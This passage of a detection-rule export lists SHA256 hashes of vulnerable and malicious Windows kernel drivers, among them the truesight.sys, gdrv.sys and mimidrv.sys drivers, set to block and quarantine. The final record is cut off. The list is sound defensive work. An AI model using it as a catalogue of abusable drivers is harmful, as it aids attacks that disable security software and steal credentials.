+ "id": "f72dac8e-789e-56ee-87ec-8a90a2a7b6b5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613048Z",
+ "creation_date": "2026-03-23T11:45:29.613049Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613055Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "03a831e18d933954d432187835e0d6aea8bf10fd84dfbe36a23366e2b0538a11",
+ "comment": "Hilscher cifX Device Driver abuse (aka Physmem.sys) [https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f7352208-6d17-5fb8-87b2-1e9c6578d4d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981629Z",
+ "creation_date": "2026-03-23T11:45:29.981637Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981651Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "760be95d4c04b10df89a78414facf91c0961020e80561eee6e2cb94b43b76510",
+ "comment": "Vulnerable Kernel Driver (aka NetFlt.sys) [https://www.loldrivers.io/drivers/30d6c39c-1d93-4101-8dd3-322ff0ab7fb3/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f73a9795-7691-5323-8088-e99e9b7ecce5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611909Z",
+ "creation_date": "2026-03-23T11:45:29.611911Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611916Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6e76764d750ebd835aa4bb055830d278df530303585614c1dc743f8d5adf97d7",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f73ef725-3459-5424-a40e-114532b5980d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816209Z",
+ "creation_date": "2026-03-23T11:45:30.816211Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816217Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "85fdd255c5d7add25fd7cd502221387a5e11f02144753890218dd31a8333a1a3",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f73fda1c-1882-549b-93da-f893fa6ff5ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816215Z",
+ "creation_date": "2026-03-23T11:45:31.816218Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816226Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "80c662a564bec8719db16eabcc3f601e3fbc6280d6682eccfed090a83300eb01",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f7467f8c-b98e-55eb-a79f-b3ac5afbe25a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609369Z",
+ "creation_date": "2026-03-23T11:45:29.609373Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609380Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c0e80958b907c8df345ec2f8d711acefb4951ee3e6e84892ecd429f5e1f3acb",
+ "comment": "Vulnerable Kernel Driver (aka gdrv.sys) [https://www.loldrivers.io/drivers/2bea1bca-753c-4f09-bc9f-566ab0193f4a/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f7469e7e-8004-5ef3-9144-c602f95efa0c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833699Z",
+ "creation_date": "2026-03-23T11:45:30.833702Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833711Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d41b6cbf58215cc6d6a0d452937aa0dd9ba73140f0ab1daa7a6f29afd4d6b4cf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f74aa327-46cd-5889-bb2e-208ec759a77b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473542Z",
+ "creation_date": "2026-03-23T11:45:31.473546Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473556Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c985671e0517054bb6fdf676c2e65a2bd0d5101564250268f7de5e716f4b81a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f74c1d60-a834-5c48-8329-3b73512e7c57",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828489Z",
+ "creation_date": "2026-03-23T11:45:30.828491Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828497Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5cd5b884ead3c1485bace633184e9c660d97f2d1e676c1ced82d5cfe33b3c213",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f7568d63-797c-5fe4-9037-12ebd43f6f46",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814123Z",
+ "creation_date": "2026-03-23T11:45:31.814127Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814134Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43c7147cb0998ef5ac62caf6996fabf9ab0ea0a465c85afd7fc744e8f8386f6a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f766690b-c9e3-556e-9f77-62129427bfb2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497856Z",
+ "creation_date": "2026-03-23T11:45:31.497858Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497863Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "227ef6cf7a61cb7b8565ba6581a619d79030a45c4bec699867a502e2677dbe30",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f777be10-23b0-50ef-bbb1-4bd4c0f5128c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465738Z",
+ "creation_date": "2026-03-23T11:45:30.465741Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465750Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1ef7afea0cf2ef246ade6606ef8b7195de9cd7a3cd7570bff90ba1e2422276f6",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f77c70f9-03fd-51d9-a7a4-7ff6d67dc19b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153015Z",
+ "creation_date": "2026-03-23T11:45:31.153018Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153026Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f0e38e7cad0e0226e2ce25db1dda0fbfe0628222a382a19d5d712005bca4bef",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f781b720-3f52-5d04-ba84-fc30e648b03d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610083Z",
+ "creation_date": "2026-03-23T11:45:29.610089Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610094Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f4d4db4abe26e765a33afb2501ac134d14cadeaa74ae8a0fae420e4ecf58e0c",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f782cccb-39d8-5245-95f0-2707bfefb998",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826882Z",
+ "creation_date": "2026-03-23T11:45:30.826885Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826890Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0bf6291bee1862214a4c2948479e6e2c9c09d7d103e9e5ca35eea5726b789e07",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f789a629-0ca7-539f-8b19-d7ef41f7e966",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476997Z",
+ "creation_date": "2026-03-23T11:45:30.477000Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477009Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e03d8492926408a299100ef02c46bf3510a816bd9eed2f988b47c066049e9111",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f7907a3e-4c74-52d4-b156-9c3d75463fa0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492338Z",
+ "creation_date": "2026-03-23T11:45:31.492340Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492345Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42527d104eac6fb21d4cb6f7f1a8d10601044127de67ac5a8832ef0266fe367b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f791b45a-b7d3-5fcb-8223-47f0f5ccdd50",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462820Z",
+ "creation_date": "2026-03-23T11:45:30.462823Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462832Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4bd4715d2a7af627da11513e32fab925c872babebdb7ff5675a75815fbf95021",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f79928f0-a5ab-562f-8d13-447fed687fb6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825854Z",
+ "creation_date": "2026-03-23T11:45:31.825856Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825861Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d56c12e9ced5e3fe9902156bf265aaef933b206828f4fe72be7b675806c637fd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f7aa33e5-d64d-5aa1-a58d-3fbed87cecbd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498865Z",
+ "creation_date": "2026-03-23T11:45:31.498885Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498895Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b4ef60abd1adf6909a91cce9bb505635921b9e6e3cb8857dea192f42f70b03b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f7acc85a-de2c-56fd-8b34-d4176c9f4d70",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491795Z",
+ "creation_date": "2026-03-23T11:45:31.491798Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491803Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea5be436504210daeae063b6ce4c17de5710dcd725dc8c798bbb6011202d6980",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f7bb5d03-3180-5b1c-a92f-f0e8c16bab94",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834297Z",
+ "creation_date": "2026-03-23T11:45:30.834301Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834310Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e72e3d969c429cf4c55a476751eec576c0388c681ff182ff629a812753011dae",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f7bd01f5-fae7-5d4d-95ce-cf7bd36e331a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
